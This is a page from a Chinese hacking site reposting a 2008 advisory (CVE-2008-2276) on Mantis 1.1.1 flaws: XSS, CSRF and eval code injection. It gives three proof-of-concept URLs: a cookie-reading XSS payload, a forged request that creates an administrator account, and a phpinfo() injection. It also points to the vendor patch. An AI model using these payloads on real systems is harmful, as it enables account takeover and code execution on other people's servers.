黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 网管频道 >> 入侵检测 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]Mantis多个输入验证漏洞
        ★★★

Mantis多个输入验证漏洞

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-5-23 10:10:36
受影响系统:
Mantis mantis 1.1.1
不受影响系统:
Mantis mantis 1.2.0a1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 29297
CVE(CAN) ID: CVE-2008-2276
Mantis是用PHP脚本语言编写的基于web的漏洞跟踪系统。
Mantis没有正确地验证用户输入,Mantis的return_dynamic_filters.php文件中存在跨站脚本漏 洞,manage_user_create.php文件中存在跨站请求伪造漏洞。此外如果用户通过上述漏洞获得了有效的管理帐号的话,由于在 adm_config_.php文件的的第80行的以下语句:
eval( ′$t_ = ′ . $f_ . ′;′ );
这里$f_是在34行定义的:
$f_ = gpc_get_string( ′′ );
$f_参数没有经过任何验证,因此攻击者可以通过执行phpinfo()函数的恶意URL导致执行任意代码。
<*来源:Francesco Ongaro (ascii@ush.it
链接:http://marc.info/?l=bugtraq&m=121130774617956&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/mantis/return_dynamic_filters.php?filter_target=<>alert(document.cookie);</>
foo@attacker.com&access_level=90&protected=0&enabled=1" target="_blank">http://www.example.com/mantis/manage_user_create.php?username=foo&realname=aa&password=aa&password_verify=aa&email=foo@attacker.com&access_level=90&protected=0&enabled=1
http://www.example.com/mantis/adm_config_.php?user_id=0&project_id=0&config_option=cache_config&type=0&=0;phpinfo()
建议:
--------------------------------------------------------------------------------
厂商补丁:
Mantis
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://mantisbt.sourceforge.net/
文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体:
    中介交易区
    最 新 热 门
    新云CMS Online.asp页面过滤不严02-26
    对网软网上购物系统的漏洞分析01-09
    测试SQL防注入脚本12-21
    Google Xss又出跨站新漏洞11-06
    一次简单的html injection导致的11-06
    风讯、科讯漏洞利用11-01
    Adobe pdf reader URI利用方式浅10-23
    超星阅览器的最新0DAY10-19
    运用SQL Injection做数据库渗透的09-22
    sa-blog 0day09-22
    HTML注入的一些简单想法09-10
    网站登陆接口的攻与防09-04
    相 关 文 章
    MS Internet Explorer GDI+ Proof of C
    Windows 98 最新登录漏洞
    PhpCms2007 sp6 SQL漏洞注入0day代码
    EmpireCMS47 SQL注入漏洞利用代码
    动网Dvbbs·php 2.0++ Blind SQL注入漏
    DEDECMS跨站及爆绝对路径漏洞
    多款RSS阅读器出现XSS漏洞
    MS08-052 WMF漏洞分析及漏洞检测
    如何检查并堵住网站的eWebEditor漏洞
    超星浏览器4.0漏洞0day & Exp
    Z-Blog死循环漏洞攻击造成博客频繁弹窗
    PhpBazar adid SQL注入漏洞
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886